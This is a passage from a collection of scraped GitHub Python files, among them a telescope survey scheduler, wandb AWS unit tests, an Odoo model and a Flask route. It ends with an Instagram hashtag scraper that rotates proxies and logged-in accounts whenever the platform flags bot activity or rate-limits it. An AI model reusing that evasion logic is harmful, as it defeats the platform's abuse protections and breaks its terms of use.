else:\n move = self.get_move()\n self.env.make_move(move)\n\n reward = self.env.get_reward()\n\n value_seq.append(np.array([reward]))\n\n delta_seq = np.array([j - i for i, j in zip(value_seq[:-1], value_seq[1:])])\n # delta_seq[:-1] = delta_seq[:-1] * (1.0 - lamda)\n\n for t, grads in enumerate(grads_seq):\n delta_sum = np.sum([(lamda ** j) * delta for j, delta in enumerate(delta_seq[t:])])\n self.sess.run(self.apply_grads,\n feed_dict={grad_: -grad * delta_sum\n for grad_, grad in zip(self.grads_s, grads)})\n\n return reward\n","repo_name":"adamklec/tic_tac_tensorflow","sub_path":"agents/forward_agent.py","file_name":"forward_agent.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"6274517441","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 29 01:37:03 2022\r\n\r\n@author: salma obeidat\r\n\"\"\"\r\n\r\nt=int(input())\r\nfor i in range(t):\r\n operations=0\r\n a,b,n=list(map(int,input().split()))\r\n while(max(a,b)<=n):\r\n if(a 0 or (iter + 2) * self.block_size > len(order):\n break\n return observations\n\n\nclass BlobSurvey(GreedySurvey):\n \"\"\"Select observations in large, mostly contiguous, blobs.\n\n Parameters\n ----------\n filtername1 : `str`\n The filter to observe in.\n filtername2 : `str`\n The filter to pair with the first observation. If set to None, no pair\n will be observed.\n slew_approx : `float`\n The approximate slewtime between neerby fields (seconds). Used to calculate\n how many observations can be taken in the desired time block.\n nexp : `int`\n The number of exposures to take in a visit.\n exp_dict : `dict`\n If set, should have keys of filtername and values of ints that are the nuber of exposures to take\n per visit. For estimating block time, nexp is still used.\n filter_change_approx : `float`\n The approximate time it takes to change filters (seconds).\n ideal_pair_time : `float`\n The ideal time gap wanted between observations to the same pointing (minutes)\n min_pair_time : `float`\n The minimum acceptable pair time (minutes)\n flush_time : `float`\n The time past the final expected exposure to flush the queue. Keeps observations\n from lingering past when they should be executed. (minutes)\n twilight_scale : `bool`\n Scale the block size to fill up to twilight. Set to False if running in twilight\n in_twilight : `bool`\n Scale the block size to stay within twilight time.\n check_scheduled : `bool`\n Check if there are scheduled observations and scale blob size to match\n min_area : `float`\n If set, demand the reward function have an area of so many square degrees before executing\n grow_blob : `bool`\n If True, try to grow the blob from the global maximum. Otherwise, just use a simple sort.\n Simple sort will not constrain the blob to be contiguous.\n max_radius_peak : `float`\n The maximum radius to demand things be within the maximum of the reward function. (degrees)\n Note that traveling salesman solver can have rare failures if this is set too large\n (probably issue with projection effects or something).\n \"\"\"\n\n def __init__(\n self,\n basis_functions,\n basis_weights,\n filtername1=\"r\",\n filtername2=\"g\",\n slew_approx=7.5,\n filter_change_approx=140.0,\n read_approx=2.0,\n exptime=30.0,\n nexp=2,\n nexp_dict=None,\n ideal_pair_time=22.0,\n min_pair_time=15.0,\n flush_time=30.0,\n smoothing_kernel=None,\n nside=None,\n dither=True,\n seed=42,\n ignore_obs=None,\n survey_note=\"blob\",\n detailers=None,\n camera=\"LSST\",\n twilight_scale=True,\n in_twilight=False,\n check_scheduled=True,\n min_area=None,\n grow_blob=True,\n area_required=None,\n max_radius_peak=40.0,\n fields=None,\n survey_name=\"\",\n **kwargs,\n ):\n self.filtername1 = filtername1\n self.filtername2 = filtername2\n\n super(BlobSurvey, self).__init__(\n basis_functions=basis_functions,\n basis_weights=basis_weights,\n filtername=None,\n block_size=0,\n smoothing_kernel=smoothing_kernel,\n dither=dither,\n seed=seed,\n ignore_obs=ignore_obs,\n nside=nside,\n detailers=detailers,\n camera=camera,\n area_required=area_required,\n fields=fields,\n )\n self.flush_time = flush_time / 60.0 / 24.0 # convert to days\n self.nexp = nexp\n self.nexp_dict = nexp_dict\n self.exptime = exptime\n self.slew_approx = slew_approx\n self.read_approx = read_approx\n self.hpids = np.arange(hp.nside2npix(self.nside))\n self.twilight_scale = twilight_scale\n self.in_twilight = in_twilight\n self.grow_blob = grow_blob\n self.max_radius_peak = np.radians(max_radius_peak)\n\n if self.twilight_scale & self.in_twilight:\n warnings.warn(\"Both twilight_scale and in_twilight are set to True. That is probably wrong.\")\n\n self.min_area = min_area\n self.check_scheduled = check_scheduled\n # If we are taking pairs in same filter, no need to add filter change time.\n if filtername1 == filtername2:\n filter_change_approx = 0\n # Compute the minimum time needed to observe a blob (or observe, then repeat.)\n if filtername2 is not None:\n self.time_needed = (\n (min_pair_time * 60.0 * 2.0 + exptime + read_approx + filter_change_approx) / 24.0 / 3600.0\n ) # Days\n else:\n self.time_needed = (min_pair_time * 60.0 + exptime + read_approx) / 24.0 / 3600.0 # Days\n self.filter_set = set(filtername1)\n if filtername2 is None:\n self.filter2_set = self.filter_set\n else:\n self.filter2_set = set(filtername2)\n\n self.ra, self.dec = _hpid2_ra_dec(self.nside, self.hpids)\n\n self.survey_note = survey_note\n self.counter = 1 # start at 1, because 0 is default in empty observation\n self.min_pair_time = min_pair_time\n self.ideal_pair_time = ideal_pair_time\n\n self.pixarea = hp.nside2pixarea(self.nside, degrees=True)\n\n # If we are only using one filter, this could be useful\n if (self.filtername2 is None) | (self.filtername1 == self.filtername2):\n self.filtername = self.filtername1\n\n def _generate_survey_name(self):\n self.survey_name = f\"Blob survey {self.filtername1}\"\n if self.filtername2 is None:\n self.survey_name += f\"_{self.filtername1}\"\n else:\n self.survey_name += f\"_{self.filtername2}\"\n\n def _check_feasibility(self, conditions):\n \"\"\"\n Check if the survey is feasable in the current conditions.\n \"\"\"\n for bf in self.basis_functions:\n result = bf.check_feasibility(conditions)\n if not result:\n return result\n\n # If we need to check that the reward function has enough area available\n if self.min_area is not None:\n reward = 0\n for bf, weight in zip(self.basis_functions, self.basis_weights):\n basis_value = bf(conditions)\n reward += basis_value * weight\n max_reward_indx = np.min(np.where(reward == np.nanmax(reward)))\n distances = _angular_separation(\n self.ra, self.dec, self.ra[max_reward_indx], self.dec[max_reward_indx]\n )\n valid_pix = np.where((np.isnan(reward) == False) & (distances < self.max_radius_peak))[0]\n if np.size(valid_pix) * self.pixarea < self.min_area:\n result = False\n return result\n\n def _set_block_size(self, conditions):\n \"\"\"\n Update the block size if it's getting near a break point.\n \"\"\"\n\n # If we are trying to get things done before twilight\n if self.twilight_scale:\n available_time = conditions.sun_n18_rising - conditions.mjd\n available_time *= 24.0 * 60.0 # to minutes\n n_ideal_blocks = available_time / self.ideal_pair_time\n else:\n n_ideal_blocks = 4\n\n # If we are trying to get things done before a scheduled simulation\n if self.check_scheduled:\n if len(conditions.scheduled_observations) > 0:\n available_time = np.min(conditions.scheduled_observations) - conditions.mjd\n available_time *= 24.0 * 60.0 # to minutes\n n_blocks = available_time / self.ideal_pair_time\n if n_blocks < n_ideal_blocks:\n n_ideal_blocks = n_blocks\n\n # If we are trying to complete before twilight ends or the night ends\n if self.in_twilight:\n at1 = conditions.sun_n12_rising - conditions.mjd\n at2 = conditions.sun_n18_setting - conditions.mjd\n times = np.array([at1, at2])\n times = times[np.where(times > 0)]\n available_time = np.min(times)\n available_time *= 24.0 * 60.0 # to minutes\n n_blocks = available_time / self.ideal_pair_time\n if n_blocks < n_ideal_blocks:\n n_ideal_blocks = n_blocks\n\n if n_ideal_blocks >= 3:\n self.nvisit_block = int(\n np.floor(\n self.ideal_pair_time\n * 60.0\n / (self.slew_approx + self.exptime + self.read_approx * (self.nexp - 1))\n )\n )\n else:\n # Now we can stretch or contract the block size to allocate the remainder time until twilight starts\n # We can take the remaining time and try to do 1,2, or 3 blocks.\n possible_times = available_time / np.arange(1, 4)\n diff = np.abs(self.ideal_pair_time - possible_times)\n best_block_time = np.max(possible_times[np.where(diff == np.min(diff))])\n self.nvisit_block = int(\n np.floor(\n best_block_time\n * 60.0\n / (self.slew_approx + self.exptime + self.read_approx * (self.nexp - 1))\n )\n )\n\n # The floor can set block to zero, make it possible to to just one\n if self.nvisit_block <= 0:\n self.nvisit_block = 1\n\n def calc_reward_function(self, conditions):\n # Set the number of observations we are going to try and take\n self._set_block_size(conditions)\n # Computing reward like usual with basis functions and weights\n if self._check_feasibility(conditions):\n self.reward = 0\n indx = np.arange(hp.nside2npix(self.nside))\n for bf, weight in zip(self.basis_functions, self.basis_weights):\n basis_value = bf(conditions, indx=indx)\n self.reward += basis_value * weight\n if self.smoothing_kernel is not None:\n self.smooth_reward()\n else:\n self.reward = -np.inf\n return self.reward\n\n if self.area_required is not None:\n max_indices = np.where(self.reward == np.nanmax(self.reward))[0]\n if np.size(max_indices) == 0:\n # This is the case if everything is masked\n self.reward = -np.inf\n else:\n max_reward_indx = np.min(max_indices)\n distances = _angular_separation(\n self.ra,\n self.dec,\n self.ra[max_reward_indx],\n self.dec[max_reward_indx],\n )\n good_area = np.where((np.abs(self.reward) >= 0) & (distances < self.max_radius_peak))[\n 0\n ].size * hp.nside2pixarea(self.nside)\n if good_area < self.area_required:\n self.reward = -np.inf\n\n self.reward_checked = True\n return self.reward\n\n def simple_order_sort(self):\n \"\"\"Fall back if we can't link contiguous blobs in the reward map\"\"\"\n\n # Assuming reward has already been calcualted\n\n potential_hp = np.where(~np.isnan(self.reward) == True)\n\n # Note, using nanmax, so masked pixels might be included in the pointing.\n # I guess I should document that it's not \"NaN pixels can't be observed\", but\n # \"non-NaN pixles CAN be observed\", which probably is not intuitive.\n ufields, reward_by_field = int_binned_stat(\n self.hp2fields[potential_hp], self.reward[potential_hp], statistic=np.nanmax\n )\n # chop off any nans\n not_nans = np.where(~np.isnan(reward_by_field) == True)\n ufields = ufields[not_nans]\n reward_by_field = reward_by_field[not_nans]\n\n order = np.argsort(reward_by_field)\n ufields = ufields[order][::-1][0 : self.nvisit_block]\n self.best_fields = ufields\n\n def generate_observations_rough(self, conditions):\n \"\"\"\n Find a good block of observations.\n \"\"\"\n\n self.reward = self.calc_reward_function(conditions)\n\n # Mask off pixels that are far away from the maximum.\n max_reward_indx = np.min(np.where(self.reward == np.nanmax(self.reward)))\n distances = _angular_separation(\n self.ra, self.dec, self.ra[max_reward_indx], self.dec[max_reward_indx]\n )\n\n self.reward[np.where(distances > self.max_radius_peak)] = np.nan\n # Check if we need to spin the tesselation\n if self.dither & (conditions.night != self.night):\n self._spin_fields(conditions)\n self.night = copy(conditions.night)\n\n if self.grow_blob:\n # Note, returns highest first\n ordered_hp = hp_grow_argsort(self.reward)\n ordered_fields = self.hp2fields[ordered_hp]\n orig_order = np.arange(ordered_fields.size)\n # Remove duplicate field pointings\n _u_of, u_indx = np.unique(ordered_fields, return_index=True)\n new_order = np.argsort(orig_order[u_indx])\n best_fields = ordered_fields[u_indx[new_order]]\n\n if np.size(best_fields) < self.nvisit_block:\n # Let's fall back to the simple sort\n self.simple_order_sort()\n else:\n self.best_fields = best_fields[0 : self.nvisit_block]\n else:\n self.simple_order_sort()\n\n if len(self.best_fields) == 0:\n # everything was nans, or self.nvisit_block was zero\n return []\n\n # Let's find the alt, az coords of the points (right now, hopefully doesn't change much in time block)\n pointing_alt, pointing_az = _approx_ra_dec2_alt_az(\n self.fields[\"RA\"][self.best_fields],\n self.fields[\"dec\"][self.best_fields],\n conditions.site.latitude_rad,\n conditions.site.longitude_rad,\n conditions.mjd,\n lmst=conditions.lmst,\n )\n\n # Let's find a good spot to project the points to a plane\n mid_alt = (np.max(pointing_alt) - np.min(pointing_alt)) / 2.0 + np.min(pointing_alt)\n\n # Code snippet from MAF for computing mean of angle accounting for wrap around\n # XXX-TODO: Maybe move this to sims_utils as a generally useful snippet.\n x = np.cos(pointing_az)\n y = np.sin(pointing_az)\n meanx = np.mean(x)\n meany = np.mean(y)\n angle = np.arctan2(meany, meanx)\n radius = np.sqrt(meanx**2 + meany**2)\n mid_az = angle % (2.0 * np.pi)\n if radius < 0.1:\n mid_az = np.pi\n\n # Project the alt,az coordinates to a plane. Could consider scaling things to represent\n # time between points rather than angular distance.\n pointing_x, pointing_y = gnomonic_project_toxy(pointing_az, pointing_alt, mid_az, mid_alt)\n # Round off positions so that we ensure identical cross-platform performance\n scale = 1e4\n pointing_x = np.round(pointing_x * scale).astype(int)\n pointing_y = np.round(pointing_y * scale).astype(int)\n # Now I have a bunch of x,y pointings. Drop into TSP solver to get an effiencent route\n towns = np.vstack((pointing_x, pointing_y)).T\n # Leaving optimize=False for speed. The optimization step doesn't usually improve much.\n better_order = tsp_convex(towns, optimize=False)\n # XXX-TODO: Could try to roll better_order to start at the nearest/fastest slew from current position.\n observations = []\n counter2 = 0\n approx_end_time = np.size(better_order) * (\n self.slew_approx + self.exptime + self.read_approx * (self.nexp - 1)\n )\n flush_time = conditions.mjd + approx_end_time / 3600.0 / 24.0 + self.flush_time\n for i, indx in enumerate(better_order):\n field = self.best_fields[indx]\n obs = empty_observation()\n obs[\"RA\"] = self.fields[\"RA\"][field]\n obs[\"dec\"] = self.fields[\"dec\"][field]\n obs[\"rotSkyPos\"] = 0.0\n obs[\"filter\"] = self.filtername1\n if self.nexp_dict is None:\n obs[\"nexp\"] = self.nexp\n else:\n obs[\"nexp\"] = self.nexp_dict[self.filtername1]\n obs[\"exptime\"] = self.exptime\n obs[\"field_id\"] = -1\n obs[\"note\"] = \"%s\" % (self.survey_note)\n obs[\"block_id\"] = self.counter\n obs[\"flush_by_mjd\"] = flush_time\n # Add the mjd for debugging\n # obs['mjd'] = conditions.mjd\n # XXX temp debugging line\n obs[\"survey_id\"] = i\n observations.append(obs)\n counter2 += 1\n\n result = observations\n return result\n","repo_name":"lsst/rubin_sim","sub_path":"rubin_sim/scheduler/surveys/surveys.py","file_name":"surveys.py","file_ext":"py","file_size_in_byte":19967,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"37"} +{"seq_id":"8395267711","text":"import os\nfrom unittest.mock import MagicMock\n\nimport pytest\nfrom botocore.exceptions import ClientError\nfrom wandb.sdk.launch.environment.aws_environment import AwsEnvironment\nfrom wandb.sdk.launch.errors import LaunchError\n\n\ndef _get_environment():\n return AwsEnvironment(\n region=\"us-west-2\",\n secret_key=\"secret_key\",\n access_key=\"access_key\",\n session_token=\"token\",\n )\n\n\ndef test_from_default(mocker) -> None:\n \"\"\"Test creating an AWS environment from the default credentials.\"\"\"\n boto3 = MagicMock()\n session = MagicMock()\n credentials = MagicMock()\n credentials.access_key = \"access_key\"\n credentials.secret_key = \"secret_key\"\n credentials.token = \"token\"\n session.get_credentials.return_value = credentials\n boto3.Session.return_value = session\n mocker.patch(\"wandb.sdk.launch.environment.aws_environment.boto3\", boto3)\n mocker.patch(\n \"wandb.sdk.launch.environment.aws_environment.AwsEnvironment\", MagicMock()\n )\n default_environment = AwsEnvironment.from_default(region=\"us-west-2\")\n assert default_environment._region == \"us-west-2\"\n assert default_environment._access_key == \"access_key\"\n assert default_environment._secret_key == \"secret_key\"\n assert default_environment._session_token == \"token\"\n\n\n@pytest.mark.asyncio\nasync def test_verify_storage(mocker):\n \"\"\"Test that the AwsEnvironment correctly verifies storage.\"\"\"\n session = MagicMock()\n client = MagicMock()\n session.client.return_value = client\n client.head_bucket.return_value = \"Success!\"\n\n async def _mock_get_session(*args, **kwargs):\n return session\n\n mocker.patch(\n \"wandb.sdk.launch.environment.aws_environment.AwsEnvironment.get_session\",\n _mock_get_session,\n )\n environment = _get_environment()\n await environment.verify_storage_uri(\"s3://bucket/key\")\n\n def _raise(*args, **kwargs):\n raise ClientError({}, \"Error\")\n\n environment.get_session = _raise\n with pytest.raises(LaunchError):\n await environment.verify_storage_uri(\"s3://bucket/key\")\n\n\n@pytest.mark.asyncio\nasync def test_verify(mocker):\n \"\"\"Test that the AwsEnvironment correctly verifies.\"\"\"\n session = MagicMock()\n client = MagicMock()\n identity = MagicMock()\n identity.get.return_value = \"123456789012\"\n client.get_caller_identity.return_value = identity\n\n async def _mock_get_session(*args, **kwargs):\n return session\n\n mocker.patch(\n \"wandb.sdk.launch.environment.aws_environment.AwsEnvironment.get_session\",\n _mock_get_session,\n )\n environment = _get_environment()\n await environment.verify()\n\n\n@pytest.mark.asyncio\nasync def test_upload_directory(mocker):\n \"\"\"Test that we issue the correct api calls to upload files to s3.\"\"\"\n \"\"\"\n Step one here is to mock the os.walk function to return a list of files\n corresponding to the following directory structure:\n source_dir\n ├── Dockerfile\n ├── main.py\n ├── module\n │ ├── submodule\n │ │ ├── that.py\n │ │ └── this.py\n │ ├── dataset.py\n │ ├── eval.py\n │ └── model.py\n └── requirements.txt\n \"\"\"\n source_dir = \"source_dir\"\n walk_output = [\n (f\"{source_dir}\", None, [\"Dockerfile\", \"main.py\", \"requirements.txt\"]),\n (os.path.join(source_dir, \"module\"), \"\", [\"dataset.py\", \"eval.py\", \"model.py\"]),\n (\n os.path.join(source_dir, \"module\", \"submodule\"),\n \"\",\n [\n \"that.py\",\n \"this.py\",\n ],\n ),\n ]\n mocker.patch(\n \"wandb.sdk.launch.environment.aws_environment.os.walk\",\n return_value=walk_output,\n )\n session = MagicMock()\n client = MagicMock()\n\n session.client.return_value = client\n\n async def _mock_get_session(*args, **kwargs):\n return session\n\n mocker.patch(\n \"wandb.sdk.launch.environment.aws_environment.AwsEnvironment.get_session\",\n _mock_get_session,\n )\n mocker.patch(\n \"wandb.sdk.launch.environment.aws_environment.os.path.isdir\", return_value=True\n )\n\n environment = AwsEnvironment(\n region=\"us-west-2\",\n access_key=\"access_key\",\n secret_key=\"secret_key\",\n session_token=\"token\",\n )\n await environment.upload_dir(source_dir, \"s3://bucket/key\")\n assert client.upload_file.call_count == 8\n assert client.upload_file.has_calls(\n [\n mocker.call(\n os.path.join(source_dir, \"Dockerfile\"),\n f\"{source_dir}/Dockerfile\",\n \"bucket\",\n \"key/Dockerfile\",\n ),\n mocker.call(\n os.path.join(source_dir, \"main.py\"),\n \"bucket\",\n \"key/main.py\",\n ),\n mocker.call(\n os.path.join(source_dir, \"requirements.txt\"),\n \"bucket\",\n \"key/requirements.txt\",\n ),\n mocker.call(\n os.path.join(source_dir, \"module\", \"dataset.py\"),\n \"bucket\",\n \"key/module/dataset.py\",\n ),\n mocker.call(\n os.path.join(source_dir, \"module\", \"eval.py\"),\n \"bucket\",\n \"key/module/eval.py\",\n ),\n mocker.call(\n os.path.join(source_dir, \"module\", \"model.py\"),\n \"bucket\",\n \"key/module/model.py\",\n ),\n mocker.call(\n os.path.join(source_dir, \"module\", \"submodule\", \"that.py\"),\n \"bucket\",\n \"key/module/submodule/that.py\",\n ),\n mocker.call(\n os.path.join(source_dir, \"module\", \"submodule\", \"this.py\"),\n \"bucket\",\n \"key/module/submodule/this.py\",\n ),\n ]\n )\n\n\n@pytest.mark.asyncio\nasync def test_upload_invalid_path(mocker):\n \"\"\"Test that we raise an error for invalid paths.\n\n The upload can't proceed if\n - the source path is not a directory, or\n - the destination path is not a valid S3 URI\n \"\"\"\n environment = _get_environment()\n with pytest.raises(LaunchError) as e:\n await environment.upload_dir(\"invalid_path\", \"s3://bucket/key\")\n assert \"Source invalid_path does not exist.\" == str(e.value)\n mocker.patch(\n \"wandb.sdk.launch.environment.aws_environment.os.path.isdir\",\n return_value=True,\n )\n for path in [\"s3a://bucket/key\", \"s3n://bucket/key\"]:\n with pytest.raises(LaunchError) as e:\n await environment.upload_dir(\"tests\", path)\n assert f\"Destination {path} is not a valid s3 URI.\" == str(e.value)\n\n\n@pytest.mark.asyncio\nasync def test_upload_file(mocker):\n client = MagicMock()\n session = MagicMock()\n session.client.return_value = client\n\n async def _mock_get_session(*args, **kwargs):\n return session\n\n mocker.patch(\n \"wandb.sdk.launch.environment.aws_environment.AwsEnvironment.get_session\",\n _mock_get_session,\n )\n mocker.patch(\n \"wandb.sdk.launch.environment.aws_environment.os.path.isfile\", return_value=True\n )\n environment = _get_environment()\n await environment.upload_file(\"source_file\", \"s3://bucket/key\")\n assert client.upload_file.call_args_list[0][0] == (\n \"source_file\",\n \"bucket\",\n \"key\",\n )\n with pytest.raises(LaunchError) as e:\n await environment.upload_file(\"source_file\", \"s3a://bucket/key\")\n assert e.content == \"Destination s3a://bucket/key is not a valid s3 URI.\"\n","repo_name":"wandb/wandb","sub_path":"tests/pytest_tests/unit_tests/test_launch/test_environment/test_aws.py","file_name":"test_aws.py","file_ext":"py","file_size_in_byte":7661,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"4087455885","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\n\nclass PosServiceBed(models.Model):\n _name = 'pos.service.bed'\n _inherit = ['mail.thread', 'mail.activity.mixin']\n\n name = fields.Char(\"Name\", track_visibility='onchange')\n code = fields.Char(\"Code\", track_visibility='onchange', copy=False)\n room_id = fields.Many2one('pos.service.room', \"Room\",track_visibility='onchange')\n state = fields.Selection([('ready', \"Ready\"), ('busy', \"Busy\"), ('maintenance', \"Maintenance\")], default='ready')\n branch_id = fields.Many2one('res.branch', related=\"room_id.branch_id\", string=\"Branch\",track_visibility='onchange', store=True, readonly=True)\n active = fields.Boolean(\"Active\",default=True, track_visibility='onchange')\n # time = fields.Float(\"Time\")\n date_start = fields.Datetime(\"Data Start\")\n hour = fields.Float(\"Hour\")\n minutes = fields.Float(\"Minutes\")\n seconds = fields.Float(\"Seconds\")\n employee_ids = fields.Many2many('hr.employee', 'hr_employee_employee_pos_service_bed',\n 'employee_pos_service_bed_id', 'hr_employee_id', string='Employee')\n employee_name = fields.Char(string='Employee', compute='get_name_employee')\n doctor_ids = fields.Many2many('hr.employee', 'hr_employee_doctor_pos_serivce_bed',\n 'doctor_pos_service_bed_id', 'hr_employee_id', string='Doctor')\n doctor_name = fields.Char(string='Doctor', compute='get_name_employee')\n\n @api.depends('employee_ids')\n def get_name_employee(self):\n for detail in self:\n if detail.employee_ids:\n employee_name = ''\n for emp in detail.employee_ids:\n employee_name += emp.name + ','\n detail.employee_name = employee_name\n else:\n detail.doctor_name = None\n\n if detail.doctor_ids:\n doctor_name = ''\n for doctor in detail.doctor_ids:\n doctor_name += doctor.name + ','\n detail.doctor_name = doctor_name\n else:\n detail.doctor_name = None\n\n _sql_constraints = [\n ('code_uniq', 'unique(code)', 'Code is unique'),\n ]\n\n @api.model\n def name_search(self, name, args=None, operator='ilike', limit=100):\n args = args or []\n if name:\n args = ['|', '|', ('name', operator, name), ('code', operator, name), ('room_id.name', operator, name)] + args\n res = self.search(args, limit=limit)\n return res.name_get()\n\n @api.multi\n def name_get(self):\n result = []\n for record in self:\n name = '%s[%s:%s]' % (str(record.name), str(record.branch_id.code), str(record.room_id.name), )\n result.append((record.id, name))\n return result\n\n @api.multi\n def action_maintenace(self):\n self.state = 'maintenance'\n\n @api.multi\n def action_ready(self):\n self.state = 'ready'","repo_name":"butagreeza/korea_spa","sub_path":"addons_custom/izi_manage_room/models/bed.py","file_name":"bed.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40417474084","text":"from flask import Blueprint, render_template, request\n\nfrom ..api.geolocation import get_location_info\n\n# Created both blueprints for each endpoint needed, especified template folder \ngeolocation_main = Blueprint(\"geolocation_main\", __name__, template_folder='template')\ngeolocation = Blueprint(\"geolocation\", __name__, template_folder='template')\n\n# This is the main blueprint created placed in the root of the route \n@geolocation_main.route(\"/\")\ndef get_location():\n return render_template('index.html')\n\n# Endpoint for calculating the distance between location provided and Moscow Ring Road \n# Endpoint will recive a location and will run function get_location_info \n@geolocation.route(\"/distance\", methods=['POST'])\ndef get_distance():\n if request.method == 'POST':\n address = request.form[\"address\"]\n ubicacion = get_location_info(address)\n\n return ubicacion\n","repo_name":"aleTorres05/Flask_example","sub_path":"app/blueprint/example_blueprint.py","file_name":"example_blueprint.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15549454518","text":"import json\nimport re\nimport traceback\nimport time\nimport os\n\nimport requests\nfrom .ins_account import update_account_status\nfrom fake_useragent import UserAgent\nfrom .request import RequestConfig as reqc, cutover_proxy\nfrom lxml import etree\nfrom .ins_login import login_and_check\n\nsleep_second = 120\n\nclass Form:\n\n def __init__(self, max_id, media_ids, page, include_persistent=0, surface='grid', tab='recent'):\n self.max_id = max_id\n self.media_ids = media_ids\n self.page = page\n self.include_persistent = include_persistent\n self.surface = surface\n self.tab = tab\n\n @property\n def data(self):\n return (dict(\n {\n 'include_persistent': self.include_persistent,\n 'max_id': self.max_id,\n 'next_media_ids': self.media_ids,\n 'page': self.page,\n 'surface': self.surface,\n 'tab': self.tab\n }\n ))\n\n def __len__(self):\n return len(repr(self.data))\n\n\nclass Request:\n\n def __init__(self, headers, cookies, tag):\n self.tag = tag\n self.headers = headers\n self.cookies = cookies\n\n def get_sections(self, form):\n return reqc.req_session().post(f'https://i.instagram.com/api/v1/tags/{self.tag}/sections/',\n headers=self.headers,\n data=form.data, cookies=self.cookies, timeout=30)\n\n def get_tag_page(self, url):\n return reqc.req_session().get(f'{url}' + self.tag + '/', headers=self.headers, cookies=self.cookies)\n\n def get_checkpoint_url(self, url):\n return reqc.req_session().get(f'{url}', headers=self.headers, cookies=self.cookies)\n\n\ndef request_header():\n headers = {\n 'User-Agent': UserAgent().Chrome, # 谷歌浏览器\n 'Accept': '*/*',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'X-Csrftoken': '',\n 'x-ig-app-id': '936619743392459',\n 'Origin': 'https://www.instagram.com',\n 'Referer': 'https://www.instagram.com/',\n 'Connection': 'close'\n }\n\n return headers\n\n\ndef get_cookie():\n with open('../cookies.txt', 'r') as file:\n return file.read()\n\n\ndef access_tag_page(tag, url=\"https://www.instagram.com/explore/tags/\"):\n global sleep_second\n headers = request_header()\n cookies = dict(eval(get_cookie()))\n headers['X-Csrftoken'] = cookies.get('csrftoken')\n request = Request(headers=headers, cookies=cookies, tag=tag)\n req = request.get_tag_page(url)\n if req.status_code == 200:\n html = req.text\n patter = re.compile(r'\"next_max_id\":\"(.*?)\",\"next_page\":(.*?),\"next_media_ids\":(.*?)}')\n list_data = re.findall(patter, html)\n\n next_max_id = ''\n next_page = ''\n next_media_ids = []\n for tuple_data in list_data:\n id = tuple_data[0]\n if len(id) > len(next_max_id):\n next_max_id = id\n next_page = tuple_data[1]\n next_media_ids = tuple_data[2]\n else:\n break\n\n all_blog_url_list = []\n next_page = 1\n count = 0\n while next_page >= 1:\n # random_second = random.randint(2, 5)\n # print('程序休眠', str(random_second) + 's')\n # time.sleep(random_second)\n\n form = Form(max_id=next_max_id, page=next_page, media_ids=next_media_ids)\n result = cycle_get_section_data(request, form)\n try:\n\n if 'data' in result:\n section_data = result.get('data')\n next_max_id = section_data.get('next_max_id')\n next_page = section_data.get('next_page')\n next_media_ids = str(list(map(int, section_data.get('next_media_ids'))))\n blog_url_list = section_data.get('blog_url_list')\n sections = section_data.get('sections')\n all_blog_url_list.extend(blog_url_list)\n print(all_blog_url_list)\n if sections == []: # sections 为[] 代表翻页到底了\n break\n else:\n print(all_blog_url_list)\n except Exception:\n print('exception', traceback.print_exc())\n break\n '''\n 请求计数:\n 访问20次接口 等待120秒\n '''\n count += 1\n if count >= 20:\n # 访问10次接口,停30秒\n count = 0\n print('累计请求20次,线程暂停{0}秒后,切换IP继续执行...'.format(sleep_second))\n cutover_proxy() # 切换新的ip爬取数据\n time.sleep(sleep_second)\n else:\n pass\n\n else:\n print('循环获取section data 结束.....')\n\n # 循环结束,把获取到的所有blog_url 保存到 {$tag}-blog-url-{$datatime}.txt\n data_time = time.strftime(\"%Y-%m-%d\", time.localtime())\n write_path = os.path.expandvars('$HOME') + '/tmp'\n with open('{0}/{1}-blog-url-{2}.txt'.format(write_path, tag, data_time), 'w') as blog_url_file:\n blog_url_file.write(str(all_blog_url_list))\n\n # url保存成功后,返回数据,执行访问blog页面流程\n data = dict({\n 'blog_url_list': all_blog_url_list\n })\n\n return dict({\n 'status': req.status_code,\n 'reason': req.reason,\n 'text': req.text,\n 'data': data\n })\n\n\n else:\n return dict({\n 'status': req.status_code,\n 'reason': req.reason,\n 'text': req.text\n })\n\n\ndef cycle_get_section_data(request, form):\n try:\n\n req_section = request.get_sections(form)\n\n if req_section.status_code == 200:\n dict_json = req_section.json()\n sections = dict_json.get('sections')\n data = dict({\n 'next_max_id': dict_json.get('next_max_id'),\n 'next_page': dict_json.get('next_page'),\n 'next_media_ids': dict_json.get('next_media_ids'),\n 'blog_url_list': resolve_section_data(sections),\n 'sections': sections\n })\n\n return dict({\n 'status': req_section.status_code,\n 'reason': req_section.reason,\n 'text': req_section.text,\n 'data': data\n })\n else:\n if \"https://i.instagram.com/challenge/?next=\" in req_section.text:\n result_json = json.loads(req_section.text)\n # 账户被检测到机器人行为,修改当前账户状态,并更换新的账户爬取\n if result_json.get(\"lock\") == True and result_json.get(\"status\") == \"fail\":\n print('账户被检测到有状态异常,正在切换至新的账户...休眠{0}秒后执行'.format(sleep_second))\n update_account_status(\"sleep\")\n # 校验并重新登录新的账号进行操作\n login_and_check()\n time.sleep(sleep_second)\n\n elif req_section.status_code == 429:\n print('请求过于频繁,切换ip和账号并在10分钟后,重新爬取...')\n login_and_check()\n cutover_proxy()\n time.sleep(600)\n\n\n return dict({\n 'status': req_section.status_code,\n 'reason': req_section.reason,\n 'text': req_section.text\n })\n\n except json.JSONDecodeError:\n # 获取response中的html元素信息,判断当前页面是否重定向到登录页\n html_text = req_section.text.encode('utf-8')\n html = etree.HTML(html_text)\n html_result = html.xpath('/html[contains(@class,\"logged-in\")]')\n if html_result:\n # 校验并重新登录新的账号进行操作\n print('正在切换新的账号.......')\n login_and_check()\n return dict({})\n\n except requests.RequestException:\n print('ssl exception:', 